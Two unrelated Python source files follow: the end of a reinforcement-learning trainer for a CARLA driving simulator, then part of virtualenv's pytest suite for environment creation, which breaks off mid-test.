if 'kmh' in settings.AGENT_ADDITIONAL_DATA:
Xs.append((np.array(X_kmh) - 50) / 50)
if 'd2wp' in settings.AGENT_ADDITIONAL_DATA:
Xs.append((np.array(X_d2wp) - 8) / 8)
if 'd2goal' in settings.AGENT_ADDITIONAL_DATA:
Xs.append((np.array(X_d2goal) - 150) / 150)
# Fit on all samples as one batch
with self.graph.as_default():
self.model.fit(Xs, np.array(y), batch_size=settings.TRAINING_BATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if log_this_step else None)
# Update optimizer with new values if there are nay
if self.optimizer[2] == 1:
self.optimizer[2] = 0
#backend.set_value(self.model.optimizer.lr, self.optimizer[3])
self.compile_model(model=self.model, lr=self.optimizer[3], decay=self.get_lr_decay()[1])
if self.optimizer[4] == 1:
self.optimizer[4] = 0
#backend.set_value(self.model.optimizer.decay, self.optimizer[5])
self.compile_model(model=self.model, lr=self.get_lr_decay()[0], decay=self.optimizer[5])
# Update optimizer stats with lr and decay
self.optimizer[0], self.optimizer[1] = self.get_lr_decay()
# If step counter reaches set value, update target network with weights of main network
if self.tensorboard.step >= self.last_target_update + self.update_target_every.value:
self.target_model.set_weights(self.model.get_weights())
self.last_target_update += self.update_target_every.value
return True
# Returns current learning rate and decay values from Adam optimizer
def get_lr_decay(self):
lr = self.model.optimizer.lr
if self.model.optimizer.initial_decay > 0:
lr = lr * (1. / (1. + self.model.optimizer.decay * backend.cast(self.model.optimizer.iterations, backend.dtype(self.model.optimizer.decay))))
return backend.eval(lr), backend.eval(self.model.optimizer.decay)
# Prepares weights to be send to agents over shared object
def serialize_weights(self):
return pickle.dumps(self.model.get_weights())
# Creates first set of weights to agents to load when they start
# Uses shared object, updates it and updates weights iteration counter so agents can see a change
def init_serialized_weights(self, weights, weights_iteration):
self.weights = weights
self.weights.raw = self.serialize_weights()
self.weights_iteration = weights_iteration
# Trains model in a loop, called from a separate thread
def train_in_loop(self):
self.tps_counter = deque(maxlen=20)
# Train infinitively
while True:
# For training speed measurement
step_start = time.time()
# If 'stop' flag - exit
if self.stop.value == STOP.stopping:
return
# If Carla broke - pause training
if self.stop.value in [STOP.carla_simulator_error, STOP.restarting_carla_simulator]:
self.trainer_stats[0] = TRAINER_STATE.paused
time.sleep(1)
continue
# If .train() call returns false, there's not enough transitions in replay memory
# Just wait (and exit on 'stop' signal)
if not self.train():
self.trainer_stats[0] = TRAINER_STATE.waiting
# Trainer is also a manager for stopping everything as it has to save a checkpoint
if self.stop.value in [STOP.at_checkpoint, STOP.now]:
self.stop.value = STOP.stopping
time.sleep(0.01)
continue
# If we are here, trainer trains a model
self.trainer_stats[0] = TRAINER_STATE.training
# Share new weights with models as fast as possible
self.weights.raw = self.serialize_weights()
with self.weights_iteration.get_lock():
self.weights_iteration.value += 1
# Training part finished here, measure time and convert it to number of trains per second
frame_time = time.time() - step_start
self.tps_counter.append(frame_time)
self.trainer_stats[1] = len(self.tps_counter)/sum(self.tps_counter)
# Shared flag set by models when they performed good to save a model
save_model = self.save_model
if save_model:
self.model.save(save_model)
self.save_model = False
# Checkpoint - if given number of episodes passed, save a checkpoint
# Checkpoints does not contain all data, they do not include stats,
# but stats are not important for training. Checkpoint does not contain replay memory
# as saving several GB of data wil slow things down significantly and
# fill-up disk space quickly
checkpoint_number = self.episode.value // self.save_checkpoint_every.value
# Save every nth step and on 'stop' flag
if checkpoint_number > self.last_checkpoint or self.stop.value == STOP.now:
# Create and save hparams file
self.models.append(f'checkpoint/{settings.MODEL_NAME}_{self.episode.value}.model')
hparams = {
'duration': self.duration.value,
'episode': self.episode.value,
'epsilon': list(self.epsilon),
'discount': self.discount.value,
'update_target_every': self.update_target_every.value,
'last_target_update': self.last_target_update,
'min_reward': self.min_reward.value,
'agent_show_preview': [list(preview) for preview in self.agent_show_preview],
'save_checkpoint_every': self.save_checkpoint_every.value,
'seconds_per_episode': self.seconds_per_episode.value,
'model_path': f'checkpoint/{settings.MODEL_NAME}_{self.episode.value}.model',
'logdir': self.logdir,
'weights_iteration': self.weights_iteration.value,
'car_npcs': list(self.car_npcs),
'models': list(set(self.models))
}
# Save the model
self.model.save(f'checkpoint/{settings.MODEL_NAME}_{hparams["episode"]}.model')
with open('checkpoint/hparams_new.json', 'w', encoding='utf-8') as f:
json.dump(hparams, f)
try:
os.remove('checkpoint/hparams.json')
except:
pass
try:
os.rename('checkpoint/hparams_new.json', 'checkpoint/hparams.json')
self.last_checkpoint = checkpoint_number
except Exception as e:
print(str(e))
# Handle for 'stop' signal
if self.stop.value in [STOP.at_checkpoint, STOP.now]:
self.stop.value = STOP.stopping
# Trainer states
@dataclass
class TRAINER_STATE:
starting = 0
waiting = 1
training = 2
finished = 3
paused = 4
# Trainer state messages
TRAINER_STATE_MESSAGE = {
0: 'STARTING',
1: 'WAITING',
2: 'TRAINING',
3: 'FINISHED',
4: 'PAUSED',
}
# Creates a model, dumps weights and saves this number
# We need this side to know how big shared object to create
def check_weights_size(model_path, weights_size):
# Memory fraction
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=settings.TRAINER_MEMORY_FRACTION)
backend.set_session(tf.Session(config=tf.ConfigProto(gpu_options=gpu_options)))
# create a model and save serialized weights' size
trainer = ARTDQNTrainer(model_path)
weights_size.value = len(trainer.serialize_weights())
# Runs trainer process
def run(model_path, logdir, stop, weights, weights_iteration, episode, epsilon, discount, update_target_every, last_target_update, min_reward, agent_show_preview, save_checkpoint_every, seconds_per_episode, duration, transitions, tensorboard_stats, trainer_stats, episode_stats, optimizer, models, car_npcs, carla_settings_stats, carla_fps):
# Set GPU used for the trainer
if settings.TRAINER_GPU is not None:
os.environ["CUDA_VISIBLE_DEVICES"]= str(settings.TRAINER_GPU)
tf.set_random_seed(1)
random.seed(1)
np.random.seed(1)
# Memory fraction
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=settings.TRAINER_MEMORY_FRACTION)
backend.set_session(tf.Session(config=tf.ConfigProto(gpu_options=gpu_options)))
# Create trainer, run second init method and initialize weights so agents can load them
trainer = ARTDQNTrainer(model_path)
trainer.init2(stop, logdir, trainer_stats, episode, epsilon, discount, update_target_every, last_target_update, min_reward, agent_show_preview, save_checkpoint_every, seconds_per_episode, duration, optimizer, models, car_npcs)
trainer.init_serialized_weights(weights, weights_iteration)
trainer_stats[0] = TRAINER_STATE.waiting
# Create training thread. We train in a separate thread so training won't block other things we do here
trainer_thread = Thread(target=trainer.train_in_loop, daemon=True)
trainer_thread.start()
# Helper deques for stat averaging
raw_rewards = deque(maxlen=settings.AGENTS*10)
weighted_rewards = deque(maxlen=settings.AGENTS*10)
episode_times = deque(maxlen=settings.AGENTS*10)
frame_times = deque(maxlen=settings.AGENTS*2)
configured_actions = [getattr(ACTIONS, action) for action in settings.ACTIONS]
# Iterate over episodes until 'stop' signal
while stop.value != 3:
# Update tensorboard step every episode
if episode.value > trainer.tensorboard.step:
trainer.tensorboard.step = episode.value
# Load new transitions put here by models and place then im memory replay table
for _ in range(transitions.qsize()):
try:
trainer.update_replay_memory(transitions.get(True, 0.1))
except:
break
# Log stats in tensorboard
while not tensorboard_stats.empty():
# Added to a Queue by agents
agent_episode, reward, agent_epsilon, episode_time, frame_time, weighted_reward, *avg_predicted_qs = tensorboard_stats.get_nowait()
# Append to lists for averaging
raw_rewards.append(reward)
weighted_rewards.append(weighted_reward)
episode_times.append(episode_time)
frame_times.append(frame_time)
# All monitored stats
episode_stats[0] = min(raw_rewards) # Minimum reward (raw)
episode_stats[1] = sum(raw_rewards)/len(raw_rewards) # Average reward (raw)
episode_stats[2] = max(raw_rewards) # Maximum reward (raw)
episode_stats[3] = min(episode_times) # Minimum episode duration
episode_stats[4] = sum(episode_times)/len(episode_times) # Average episode duration
episode_stats[5] = max(episode_times) # Maximum episode duration
episode_stats[6] = sum(frame_times)/len(frame_times) # Average agent FPS
episode_stats[7] = min(weighted_rewards) # Minimum reward (weighted)
episode_stats[8] = sum(weighted_rewards)/len(weighted_rewards) # Average reward (weighted)
episode_stats[9] = max(weighted_rewards) # Maximum reward (weighted)
tensorboard_q_stats = {}
for action, (avg_predicted_q, std_predicted_q, usage_predicted_q) in enumerate(zip(avg_predicted_qs[0::3], avg_predicted_qs[1::3], avg_predicted_qs[2::3])):
if avg_predicted_q != -10**6:
episode_stats[action*3 + 10] = avg_predicted_q
tensorboard_q_stats[f'q_action_{action - 1}_{ACTIONS_NAMES[configured_actions[action - 1]]}_avg' if action else f'q_all_actions_avg'] = avg_predicted_q
if std_predicted_q != -10 ** 6:
episode_stats[action*3 + 11] = std_predicted_q
tensorboard_q_stats[f'q_action_{action - 1}_{ACTIONS_NAMES[configured_actions[action - 1]]}_std' if action else f'q_all_actions_std'] = std_predicted_q
if usage_predicted_q != -10 ** 6:
episode_stats[action*3 + 12] = usage_predicted_q
if action > 0:
tensorboard_q_stats[f'q_action_{action - 1}_{ACTIONS_NAMES[configured_actions[action - 1]]}_usage_pct'] = usage_predicted_q
carla_stats = {}
for process_no in range(settings.CARLA_HOSTS_NO):
for index, stat in enumerate(['carla_{}_car_npcs', 'carla_{}_weather_sun_azimuth', 'carla_{}_weather_sun_altitude', 'carla_{}_weather_clouds_pct', 'carla_{}_weather_wind_pct', 'carla_{}_weather_rain_pct']):
if carla_settings_stats[process_no][index] != -1:
carla_stats[stat.format(process_no+1)] = carla_settings_stats[process_no][index]
carla_stats[f'carla_{process_no + 1}_fps'] = carla_fps[process_no].value
# Save logs
trainer.tensorboard.update_stats(step=agent_episode, reward_raw_avg=episode_stats[1], reward_raw_min=episode_stats[0], reward_raw_max=episode_stats[2], reward_weighted_avg=episode_stats[8], reward_weighted_min=episode_stats[7], reward_weighted_max=episode_stats[9], epsilon=agent_epsilon, episode_time_avg=episode_stats[4], episode_time_min=episode_stats[3], episode_time_max=episode_stats[5], agent_fps_avg=episode_stats[6], optimizer_lr=optimizer[0], optimizer_decay=optimizer[1], **tensorboard_q_stats, **carla_stats)
# Save model, but only when min reward is greater or equal a set value
if episode_stats[7] >= min_reward.value:
trainer.save_model = f'models/{settings.MODEL_NAME}__{episode_stats[2]:_>7.2f}max_{episode_stats[1]:_>7.2f}avg_{episode_stats[0]:_>7.2f}min__{int(time.time())}.model'
time.sleep(0.01)
# End of training, wait for trainer thread to finish
trainer_thread.join()
trainer_stats[0] = TRAINER_STATE.finished
|
test_creator.py | from __future__ import absolute_import, unicode_literals
import ast
import difflib
import gc
import json
import logging
import os
import shutil
import site
import stat
import subprocess
import sys
import zipfile
from collections import OrderedDict
from itertools import product
from stat import S_IREAD, S_IRGRP, S_IROTH
from textwrap import dedent
from threading import Thread
import pytest
from virtualenv.__main__ import run, run_with_catch
from virtualenv.create.creator import DEBUG_SCRIPT, Creator, get_env_debug_info
from virtualenv.create.pyenv_cfg import PyEnvCfg
from virtualenv.create.via_global_ref.builtin.cpython.cpython2 import CPython2PosixBase
from virtualenv.create.via_global_ref.builtin.cpython.cpython3 import CPython3Posix
from virtualenv.create.via_global_ref.builtin.python2.python2 import Python2
from virtualenv.discovery.py_info import PythonInfo
from virtualenv.info import IS_PYPY, IS_WIN, PY2, PY3, fs_is_case_sensitive
from virtualenv.run import cli_run, session_via_cli
from virtualenv.util.path import Path
from virtualenv.util.six import ensure_str, ensure_text
CURRENT = PythonInfo.current_system()
def test_os_path_sep_not_allowed(tmp_path, capsys):
target = str(tmp_path / "a{}b".format(os.pathsep))
err = _non_success_exit_code(capsys, target)
msg = (
"destination {!r} must not contain the path separator ({}) as this"
" would break the activation scripts".format(target, os.pathsep)
)
assert msg in err, err
def _non_success_exit_code(capsys, target):
with pytest.raises(SystemExit) as context:
run_with_catch(args=[target])
assert context.value.code != 0
out, err = capsys.readouterr()
assert "SystemExit: " in out
return err
def test_destination_exists_file(tmp_path, capsys):
target = tmp_path / "out"
target.write_text("")
err = _non_success_exit_code(capsys, str(target))
msg = "the destination {} already exists and is a file".format(str(target))
assert msg in err, err
@pytest.mark.skipif(sys.platform == "win32", reason="Windows only applies R/O to files")
def test_destination_not_write_able(tmp_path, capsys):
if hasattr(os, "geteuid"):
if os.geteuid() == 0:
pytest.skip("no way to check permission restriction when running under root")
target = tmp_path
prev_mod = target.stat().st_mode
target.chmod(S_IREAD | S_IRGRP | S_IROTH)
try:
err = _non_success_exit_code(capsys, str(target))
msg = "the destination . is not write-able at {}".format(str(target))
assert msg in err, err
finally:
target.chmod(prev_mod)
def cleanup_sys_path(paths):
from virtualenv.create.creator import HERE
paths = [p.resolve() for p in (Path(os.path.abspath(i)) for i in paths) if p.exists()]
to_remove = [Path(HERE)]
if os.environ.get(str("PYCHARM_HELPERS_DIR")):
to_remove.append(Path(os.environ[str("PYCHARM_HELPERS_DIR")]).parent)
to_remove.append(Path(os.path.expanduser("~")) / ".PyCharm")
result = [i for i in paths if not any(str(i).startswith(str(t)) for t in to_remove)]
return result
@pytest.fixture(scope="session")
def system(session_app_data):
return get_env_debug_info(Path(CURRENT.system_executable), DEBUG_SCRIPT, session_app_data, os.environ)
CURRENT_CREATORS = list(i for i in CURRENT.creators().key_to_class.keys() if i != "builtin")
CREATE_METHODS = []
for k, v in CURRENT.creators().key_to_meta.items():
if k in CURRENT_CREATORS:
if v.can_copy:
CREATE_METHODS.append((k, "copies"))
if v.can_symlink:
CREATE_METHODS.append((k, "symlinks"))
_VENV_BUG_ON = (
IS_PYPY
and CURRENT.version_info[0:3] == (3, 6, 9)
and CURRENT.pypy_version_info[0:2] == [7, 3, 0]
and CURRENT.platform == "linux"
)
@pytest.mark.parametrize(
"creator, isolated",
[
pytest.param(
*i,
marks=pytest.mark.xfail(
reason="https://bitbucket.org/pypy/pypy/issues/3159/pypy36-730-venv-fails-with-copies-on-linux",
strict=True,
)
)
if _VENV_BUG_ON and i[0][0] == "venv" and i[0][1] == "copies"
else i
for i in product(CREATE_METHODS, ["isolated", "global"])
],
ids=lambda i: "-".join(i) if isinstance(i, tuple) else i,
)
def test_create_no_seed(python, creator, isolated, system, coverage_env, special_name_dir):
if creator[0] == "venv" and sys.version_info[0:2] == (3, 4): # venv on python3.4 only supports ascii chars
special_name_dir = special_name_dir.with_name(special_name_dir.name.encode("ascii", errors="ignore").decode())
dest = special_name_dir
creator_key, method = creator
cmd = [
"-v",
"-v",
"-p",
ensure_text(python),
ensure_text(str(dest)),
"--without-pip",
"--activators",
"",
"--creator",
creator_key,
"--{}".format(method),
]
if isolated == "global":
cmd.append("--system-site-packages")
result = cli_run(cmd)
creator = result.creator
coverage_env()
if IS_PYPY:
# pypy cleans up file descriptors periodically so our (many) subprocess calls impact file descriptor limits
# force a close of these on system where the limit is low-ish (e.g. MacOS 256)
gc.collect()
purelib = creator.purelib
patch_files = {purelib / "{}.{}".format("_virtualenv", i) for i in ("py", "pyc", "pth")}
patch_files.add(purelib / "__pycache__")
content = set(creator.purelib.iterdir()) - patch_files
assert not content, "\n".join(ensure_text(str(i)) for i in content)
assert creator.env_name == ensure_text(dest.name)
debug = creator.debug
assert "exception" not in debug, "{}\n{}\n{}".format(debug.get("exception"), debug.get("out"), debug.get("err"))
sys_path = cleanup_sys_path(debug["sys"]["path"])
system_sys_path = cleanup_sys_path(system["sys"]["path"])
our_paths = set(sys_path) - set(system_sys_path)
our_paths_repr = "\n".join(ensure_text(repr(i)) for i in our_paths)
# ensure we have at least one extra path added
assert len(our_paths) >= 1, our_paths_repr
# ensure all additional paths are related to the virtual environment
for path in our_paths:
msg = "\n{}\ndoes not start with {}\nhas:\n{}".format(
ensure_text(str(path)),
ensure_text(str(dest)),
"\n".join(ensure_text(str(p)) for p in system_sys_path),
)
assert str(path).startswith(str(dest)), msg
# ensure there's at least a site-packages folder as part of the virtual environment added
assert any(p for p in our_paths if p.parts[-1] == "site-packages"), our_paths_repr
# ensure the global site package is added or not, depending on flag
global_sys_path = system_sys_path[-1]
if isolated == "isolated":
msg = "global sys path {} is in virtual environment sys path:\n{}".format(
ensure_text(str(global_sys_path)),
"\n".join(ensure_text(str(j)) for j in sys_path),
)
assert global_sys_path not in sys_path, msg
else:
common = []
for left, right in zip(reversed(system_sys_path), reversed(sys_path)):
if left == right:
common.append(left)
else:
break
def list_to_str(iterable):
return [ensure_text(str(i)) for i in iterable]
assert common, "\n".join(difflib.unified_diff(list_to_str(sys_path), list_to_str(system_sys_path)))
# test that the python executables in the bin directory are either:
# - files
# - absolute symlinks outside of the venv
# - relative symlinks inside of the venv
if sys.platform == "win32":
exes = ("python.exe",)
else:
exes = ("python", "python{}".format(*sys.version_info), "python{}.{}".format(*sys.version_info))
if creator_key == "venv":
# for venv some repackaging does not includes the pythonx.y
exes = exes[:-1]
for exe in exes:
exe_path = creator.bin_dir / exe
assert exe_path.exists(), "\n".join(str(i) for i in creator.bin_dir.iterdir())
if not exe_path.is_symlink(): # option 1: a real file
continue # it was a file
link = os.readlink(str(exe_path))
if not os.path.isabs(link): # option 2: a relative symlink
continue
# option 3: an absolute symlink, should point outside the venv
assert not link.startswith(str(creator.dest))
if IS_WIN and CURRENT.implementation == "CPython":
python_w = creator.exe.parent / "pythonw.exe"
assert python_w.exists()
assert python_w.read_bytes() != creator.exe.read_bytes()
if CPython3Posix.pyvenv_launch_patch_active(PythonInfo.from_exe(python)) and creator_key != "venv":
result = subprocess.check_output(
[str(creator.exe), "-c", 'import os; print(os.environ.get("__PYVENV_LAUNCHER__"))'],
universal_newlines=True,
).strip()
assert result == "None"
if isinstance(creator, CPython2PosixBase):
make_file = debug["makefile_filename"]
assert os.path.exists(make_file)
git_ignore = (dest / ".gitignore").read_text()
assert git_ignore.splitlines() == ["# created by virtualenv automatically", "*"]
def test_create_vcs_ignore_exists(tmp_path):
git_ignore = tmp_path / ".gitignore"
git_ignore.write_text("magic")
cli_run([str(tmp_path), "--without-pip", "--activators", ""])
assert git_ignore.read_text() == "magic"
def test_create_vcs_ignore_override(tmp_path):
git_ignore = tmp_path / ".gitignore"
cli_run([str(tmp_path), "--without-pip", "--no-vcs-ignore", "--activators", ""])
assert not git_ignore.exists()
def test_create_vcs_ignore_exists_override(tmp_path):
git_ignore = tmp_path / ".gitignore"
git_ignore.write_text("magic")
cli_run([str(tmp_path), "--without-pip", "--no-vcs-ignore", "--activators", ""])
assert git_ignore.read_text() == "magic"
@pytest.mark.skipif(not CURRENT.has_venv, reason="requires interpreter with venv")
def test_venv_fails_not_inline(tmp_path, capsys, mocker):
if hasattr(os, "geteuid"):
if os.geteuid() == 0:
pytest.skip("no way to check permission restriction when running under root")
def _session_via_cli(args, options=None, setup_logging=True, env=None):
session = session_via_cli(args, options, setup_logging, env)
assert session.creator.can_be_inline is False
return session
mocker.patch("virtualenv.run.session_via_cli", side_effect=_session_via_cli)
before = tmp_path.stat().st_mode
cfg_path = tmp_path / "pyvenv.cfg"
cfg_path.write_text(ensure_text(""))
cfg = str(cfg_path)
try:
os.chmod(cfg, stat.S_IREAD | stat.S_IRGRP | stat.S_IROTH)
cmd = ["-p", str(CURRENT.executable), str(tmp_path), "--without-pip", "--creator", "venv"]
with pytest.raises(SystemExit) as context:
run(cmd)
assert context.value.code != 0
finally:
os.chmod(cfg, before)
out, err = capsys.readouterr()
assert "subprocess call failed for" in out, out
assert "Error:" in err, err
@pytest.mark.skipif(not sys.version_info[0] == 2, reason="python 2 only tests")
def test_debug_bad_virtualenv(tmp_path):
cmd = [str(tmp_path), "--without-pip"]
result = cli_run(cmd)
# if the site.py is removed/altered the debug should fail as no one is around to fix the paths
site_py = result.creator.stdlib / "site.py"
site_py.unlink()
# insert something that writes something on the stdout
site_py.write_text('import sys; sys.stdout.write(repr("std-out")); sys.stderr.write("std-err"); raise ValueError')
debug_info = result.creator.debug
assert debug_info["returncode"]
assert debug_info["err"].startswith("std-err")
assert "std-out" in debug_info["out"]
assert debug_info["exception"]
@pytest.mark.parametrize("creator", CURRENT_CREATORS)
@pytest.mark.parametrize("clear", [True, False], ids=["clear", "no_clear"])
def test_create_clear_resets(tmp_path, creator, clear, caplog):
caplog.set_level(logging.DEBUG)
if creator == "venv" and clear is False:
pytest.skip("venv without clear might fail")
marker = tmp_path / "magic"
cmd = [str(tmp_path), "--seeder", "app-data", "--without-pip", "--creator", creator, "-vvv"]
cli_run(cmd)
marker.write_text("") # if we a marker file this should be gone on a clear run, remain otherwise
assert marker.exists()
cli_run(cmd + (["--clear"] if clear else []))
assert marker.exists() is not clear
@pytest.mark.parametrize("creator", CURRENT_CREATORS)
@pytest.mark.parametrize("prompt", [None, "magic"])
def test_prompt_set(tmp_path, creator, prompt):
cmd = [str(tmp_path), "--seeder", "app-data", "--without-pip", "--creator", creator]
if prompt is not None:
cmd.extend(["--prompt", "magic"])
result = cli_run(cmd)
actual_prompt = tmp_path.name if prompt is None else prompt
cfg = PyEnvCfg.from_file(result.creator.pyenv_cfg.path)
if prompt is None:
assert "prompt" not in cfg
else:
if creator != "venv":
assert "prompt" in cfg, list(cfg.content.keys())
assert cfg["prompt"] == actual_prompt
@pytest.mark.slow
def test_cross_major(cross_python, coverage_env, tmp_path, session_app_data, current_fastest):
cmd = [
"-p",
ensure_text(cross_python.executable),
ensure_text(str(tmp_path)),
"--no-setuptools",
"--no-wheel",
"--activators",
"",
]
result = cli_run(cmd)
pip_scripts = {i.name.replace(".exe", "") for i in result.creator.script_dir.iterdir() if i.name.startswith("pip")}
major, minor = cross_python.version_info[0:2]
assert pip_scripts == {
"pip",
"pip{}".format(major),
"pip-{}.{}".format(major, minor),
"pip{}.{}".format(major, minor),
}
coverage_env()
env = PythonInfo.from_exe(str(result.creator.exe), session_app_data)
assert env.version_info.major != CURRENT.version_info.major
def test_create_parallel(tmp_path, monkeypatch, temp_app_data):
def create(count):
subprocess.check_call(
[sys.executable, "-m", "virtualenv", "-vvv", str(tmp_path / "venv{}".format(count)), "--without-pip"],
)
threads = [Thread(target=create, args=(i,)) for i in range(1, 4)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def test_creator_input_passed_is_abs(tmp_path, monkeypatch):
monkeypatch.chdir(tmp_path)
result = Creator.validate_dest("venv")
assert str(result) == str(tmp_path / "venv")
@pytest.mark.skipif(os.altsep is None, reason="OS does not have an altsep")
def test_creator_replaces_altsep_in_dest(tmp_path):
dest = str(tmp_path / "venv{}foobar")
result = Creator.validate_dest(dest.format(os.altsep))
assert str(result) == dest.format(os.sep)
def test_create_long_path(current_fastest, tmp_path):
if sys.platform == "darwin":
max_shebang_length = 512
else:
max_shebang_length = 127
# filenames can be at most 255 long on macOS, so split to to levels
count = max_shebang_length - len(str(tmp_path))
folder = tmp_path / ("a" * (count // 2)) / ("b" * (count // 2)) / "c"
folder.mkdir(parents=True)
cmd = [str(folder)]
result = cli_run(cmd)
subprocess.check_call([str(result.creator.script("pip")), "--version"])
@pytest.mark.parametrize("creator", sorted(set(PythonInfo.current_system().creators().key_to_class) - {"builtin"}))
def test_create_distutils_cfg(creator, tmp_path, monkeypatch, session_app_data):
result = cli_run([ensure_text(str(tmp_path / "venv")), "--activators", "", "--creator", creator])
app = Path(__file__).parent / "console_app"
dest = tmp_path / "console_app"
shutil.copytree(str(app), str(dest))
setup_cfg = dest / "setup.cfg"
conf = dedent(
"""
[install]
prefix={0}{1}prefix
install_purelib={0}{1}purelib
install_platlib={0}{1}platlib
install_headers={0}{1}headers
install_scripts={0}{1}scripts
install_data={0}{1}data
""".format(
tmp_path,
os.sep,
),
)
setup_cfg.write_text(setup_cfg.read_text() + conf)
monkeypatch.chdir(dest) # distutils will read the setup.cfg from the cwd, so change to that
install_demo_cmd = [
str(result.creator.script("pip")),
"--disable-pip-version-check",
"install",
str(dest),
"--no-use-pep517",
"-vv",
]
subprocess.check_call(install_demo_cmd)
magic = result.creator.script("magic") # console scripts are created in the right location
assert magic.exists()
package_folder = result.creator.purelib / "demo" # prefix is set to the virtualenv prefix for install
assert package_folder.exists(), list_files(str(tmp_path))
def list_files(path):
result = ""
for root, _, files in os.walk(path):
level = root.replace(path, "").count(os.sep)
indent = " " * 4 * level
result += "{}{}/\n".format(indent, os.path.basename(root))
sub = " " * 4 * (level + 1)
for f in files:
result += "{}{}\n".format(sub, f)
return result
@pytest.mark.parametrize("python_path_on", [True, False], ids=["on", "off"])
@pytest.mark.skipif(PY3, reason="we rewrite sys.path only on PY2")
def test_python_path(monkeypatch, tmp_path, python_path_on):
result = cli_run([ensure_text(str(tmp_path)), "--without-pip", "--activators", ""])
monkeypatch.chdir(tmp_path)
case_sensitive = fs_is_case_sensitive()
def _get_sys_path(flag=None):
cmd = [str(result.creator.exe)]
if flag:
cmd.append(flag)
cmd.extend(["-c", "import json; import sys; print(json.dumps(sys.path))"])
return [i if case_sensitive else i.lower() for i in json.loads(subprocess.check_output(cmd))]
monkeypatch.delenv(str("PYTHONPATH"), raising=False)
base = _get_sys_path()
# note the value result.creator.interpreter.system_stdlib cannot be set, as that would disable our custom site.py
python_paths = [
str(Path(result.creator.interpreter.prefix)),
str(Path(result.creator.interpreter.system_stdlib) / "b"),
str(result.creator.purelib / "a"),
str(result.creator.purelib),
str(result.creator.bin_dir),
str(tmp_path / "base"),
str(tmp_path / "base_sep") + os.sep,
"name",
"name{}".format(os.sep),
str(tmp_path.parent / (ensure_text(tmp_path.name) + "_suffix")),
".",
"..",
"",
]
python_path_env = os.pathsep.join(ensure_str(i) for i in python_paths)
monkeypatch.setenv(str("PYTHONPATH"), python_path_env)
extra_all = _get_sys_path(None if python_path_on else "-E")
if python_path_on:
assert extra_all[0] == "" # the cwd is always injected at start as ''
extra_all = extra_all[1:]
assert base[0] == ""
base = base[1:]
assert not (set(base) - set(extra_all)) # all base paths are present
abs_python_paths = list(OrderedDict((os.path.abspath(ensure_text(i)), None) for i in python_paths).keys())
abs_python_paths = [i if case_sensitive else i.lower() for i in abs_python_paths]
extra_as_python_path = extra_all[: len(abs_python_paths)]
assert abs_python_paths == extra_as_python_path # python paths are there at the start
non_python_path = extra_all[len(abs_python_paths) :]
assert non_python_path == [i for i in base if i not in extra_as_python_path]
else:
assert base == extra_all
@pytest.mark.skipif(
not (CURRENT.implementation == "CPython" and PY2),
reason="stdlib components without py files only possible on CPython2",
)
@pytest.mark.parametrize(
"py, pyc",
list(
product(
[True, False] if Python2.from_stdlib(Python2.mappings(CURRENT), "os.py")[2] else [False],
[True, False] if Python2.from_stdlib(Python2.mappings(CURRENT), "os.pyc")[2] else [False],
),
),
)
def test_py_pyc_missing(tmp_path, mocker, session_app_data, py, pyc):
"""Ensure that creation can succeed if os.pyc exists (even if os.py has been deleted)"""
previous = Python2.from_stdlib
def from_stdlib(mappings, name):
path, to, exists = previous(mappings, name)
if name.endswith("py"):
exists = py
elif name.endswith("pyc"):
exists = pyc
return path, to, exists
mocker.patch.object(Python2, "from_stdlib", side_effect=from_stdlib)
result = cli_run([ensure_text(str(tmp_path)), "--without-pip", "--activators", "", "-vv"])
py_at = Python2.from_stdlib(Python2.mappings(CURRENT), "os.py")[1](result.creator, Path("os.py"))
py = pyc is False or py # if pyc is False we fallback to serve the py, which will exist (as we only mock the check)
assert py_at.exists() is py
pyc_at = Python2.from_stdlib(Python2.mappings(CURRENT), "osc.py")[1](result.creator, Path("os.pyc"))
assert pyc_at.exists() is pyc
def test_zip_importer_can_import_setuptools(tmp_path):
"""We're patching the loaders so might fail on r/o loaders, such as zipimporter on CPython<3.8"""
result = cli_run([str(tmp_path / "venv"), "--activators", "", "--no-pip", "--no-wheel", "--copies"])
zip_path = tmp_path / "site-packages.zip"
with zipfile.ZipFile(str(zip_path), "w", zipfile.ZIP_DEFLATED) as zip_handler:
lib = str(result.creator.purelib)
for root, _, files in os.walk(lib):
base = root[len(lib) :].lstrip(os.pathsep)
for file in files:
if not file.startswith("_virtualenv"):
zip_handler.write(filename=os.path.join(root, file), arcname=os.path.join(base, file))
for folder in result.creator.purelib.iterdir():
if not folder.name.startswith("_virtualenv"):
if folder.is_dir():
shutil.rmtree(str(folder), ignore_errors=True)
else:
folder.unlink()
env = os.environ.copy()
env[str("PYTHONPATH")] = str(zip_path)
subprocess.check_call([str(result.creator.exe), "-c", "from setuptools.dist import Distribution"], env=env)
# verify that python in created virtualenv does not preimport threading.
# https://github.com/pypa/virtualenv/issues/1895
#
# coverage is disabled, because when coverage is active, it imports threading in default mode.
@pytest.mark.xfail(
IS_PYPY and PY3 and sys.platform.startswith("darwin"),
reason="https://foss.heptapod.net/pypy/pypy/-/issues/3269",
)
def test_no_preimport_threading(tmp_path, no_coverage):
session = cli_run([ensure_text(str(tmp_path))])
out = subprocess.check_output(
[str(session.creator.exe), "-c", r"import sys; print('\n'.join(sorted(sys.modules)))"],
universal_newlines=True,
)
imported = set(out.splitlines())
assert "threading" not in imported
# verify that .pth files in site-packages/ are always processed even if $PYTHONPATH points to it.
def test_pth_in_site_vs_PYTHONPATH(tmp_path):
session = cli_run([ensure_text(str(tmp_path))])
site_packages = str(session.creator.purelib)
# install test.pth that sets sys.testpth='ok'
with open(os.path.join(site_packages, "test.pth"), "w") as f:
f.write('import sys; sys.testpth="ok"\n')
# verify that test.pth is activated when interpreter is run
out = subprocess.check_output(
[str(session.creator.exe), "-c", r"import sys; print(sys.testpth)"],
universal_newlines=True,
)
assert out == "ok\n"
# same with $PYTHONPATH pointing to site_packages
env = os.environ.copy()
path = [site_packages]
if "PYTHONPATH" in env:
path.append(env["PYTHONPATH"])
env["PYTHONPATH"] = os.pathsep.join(path)
out = subprocess.check_output(
[str(session.creator.exe), "-c", r"import sys; print(sys.testpth)"],
universal_newlines=True,
env=env,
)
assert out == "ok\n"
def test_getsitepackages_system_site(tmp_path):
# Test without --system-site-packages
session = cli_run([ensure_text(str(tmp_path))])
system_site_packages = get_expected_system_site_packages(session)
out = subprocess.check_output(
